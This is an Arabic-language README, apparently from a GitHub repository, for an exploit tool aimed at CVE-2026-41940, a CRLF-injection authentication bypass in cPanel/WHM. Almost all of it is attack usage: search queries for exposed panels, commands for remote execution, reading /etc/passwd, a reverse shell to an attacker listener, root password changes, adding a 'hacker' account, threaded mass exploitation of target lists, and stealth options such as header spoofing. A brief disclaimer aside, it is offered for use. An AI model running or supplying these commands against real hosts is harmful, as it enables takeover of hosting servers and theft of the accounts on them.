
🚀 CVE-2026-41940 استغلال تجاوز المصادقة في cPanel/WHM - أفضل سير عمل 💥 يؤدي حقن CRLF إلى تجاوز المصادقة واختطاف الجلسات وتسريب الحسابات. ✅ دعم البروكسي، وكيل مستخدم مخصص، keep-alive، إعادة المحاولات، التحقق من SSL، مخرجات ملونة، والحفظ في ملف. ⚡ إثبات مفهوم (PoC) متقدم لمختبري الاختراق.

إصدار cPanel & WHM - حقن CRLF لتجاوز المصادقة واختطاف الجلسة بالكامل
يستغل هذا الإكسبلويت CVE-2026-41940، وهي ثغرة حرجة لتجاوز المصادقة في cPanel/WHM. من خلال حقن حمولة CRLF مصمّمة خصيصًا في نظام إدارة الجلسات، يحقق اختطاف الجلسة ووصول الجذر وسيطرة كاملة على لوحة الاستضافة دون أي بيانات اعتماد صالحة.
port:2087 "cPanel" "WHM"
port:2083 "cPanel"
⚠️ إخلاء مسؤولية: هذه الأداة مخصصة لاختبارات الأمان المصرّح بها وللأغراض التعليمية فقط. الوصول غير المصرّح به غير قانوني.
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit
# Install dependencies
pip3 install -r requirements.txt
# Run
python3 exploit.py -t https://example.com:2087
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087
# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt
# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v
# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i
[email protected] $ accounts # List all cPanel accounts
[email protected] $ version # Show cPanel version
[email protected] $ ls /home # List directory
[email protected] $ cat /etc/passwd # Read file
[email protected] $ exec id # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123 # Create new user
[email protected] $ exit # Exit shell
## 🔧 تنفيذ الأوامر عن بُعد
```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"
# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php
# Attacker machine (listener)
nc -lvnp 4444
# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"
# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234
# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive # Disable auto keep-alive
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20
# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443
# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080
# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5
# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify
docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102
docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102
اطّلِع على مستودعات الاستغلال الأخرى الخاصة بي:
| الفئة | الميزات |
|---|
| الاستغلال | ✅ تجاوز المصادقة عبر حقن CRLF ✅ اختطاف جلسة WHM ✅ تسريب رمز الأمان ✅ وصول فوري للجذر |
| ما بعد الاستغلال | ✅ استخراج قائمة الحسابات (المستخدم + النطاق) ✅ تنفيذ الأوامر عن بُعد (RCE) ✅ قشرة عكسية (متوافقة مع netcat) ✅ قراءة الملفات (الإعدادات، السجلات، إلخ) ✅ تغيير كلمة مرور الجذر ✅ إنشاء مستخدم cPanel جديد |
| المسح | ✅ استغلال هدف واحد ✅ مسح جماعي متعدد الأهداف ✅ تعدد الخيوط (خيوط قابلة للتكوين) ✅ دعم تجاوز المنفذ |
| التخفي | ✅ تأخيرات عشوائية بين الطلبات ✅ انتحال X-Forwarded-For ✅ دعم User-Agent مخصص ✅ دعم البروكسي (HTTP/HTTPS) |
| سهولة الاستخدام | ✅ قشرة WHM تفاعلية (-i)✅ مخرجات ملوّنة (colorama) ✅ وضع Verbose/Debug ✅ تصدير قائمة الحسابات إلى ملف ✅ خيط جلسة Keep-Alive ✅ آلية إعادة المحاولة للاتصالات غير المستقرة |
| المنتج | الإصدارات | الحالة |
|---|
| cPanel & WHM | 11.92 - 11.102 | ✅ مؤكّد |
| cPanel & WHM | 11.104 - 11.110 | ✅ مؤكّد |
| cPanel & WHM | 11.118 - 11.136 | ⚠️ محدود |
| cPanel & WHM | < 11.86 | ✅ ربما معرّض |
| المختصر | الطويل | الوصف | الافتراضي |
|---|
-t | --target | عنوان URL لهدف واحد | مطلوب (هدف واحد) |
-l | --target-file | ملف يحتوي على قائمة الأهداف | مطلوب (مسح جماعي) |
-p | --port | تجاوز المنفذ | كشف تلقائي |
-o | --output | حفظ قائمة الحسابات في ملف | لا شيء |
-v | --verbose | تفعيل مخرجات التصحيح | خطأ |
-i | --interactive | قشرة WHM تفاعلية | خطأ |
--proxy | بروكسي HTTP/HTTPS | لا شيء | |
-ua | --user-agent | User-Agent مخصص | عشوائي |
--cmd | تنفيذ أمر واحد | لا شيء | |
--reverse-shell | قشرة عكسية IP:PORT | لا شيء | |
--passwd | تغيير كلمة مرور الجذر | لا شيء | |
--adduser | إنشاء مستخدم جديد (USER DOMAIN PASS) | لا شيء | |
--read | قراءة ملف من الهدف | لا شيء | |
--threads | عدد الخيوط للمسح الجماعي | 10 | |
--delay | فاصل Keep-Alive (بالثواني) | 3.0 | |
--max-retries | الحد الأقصى لإعادة المحاولة لكل طلب | 3 | |
--no-keep-alive | عدم الحفاظ على الجلسة | خطأ | |
--ssl-verify | التحقق من شهادات SSL | خطأ |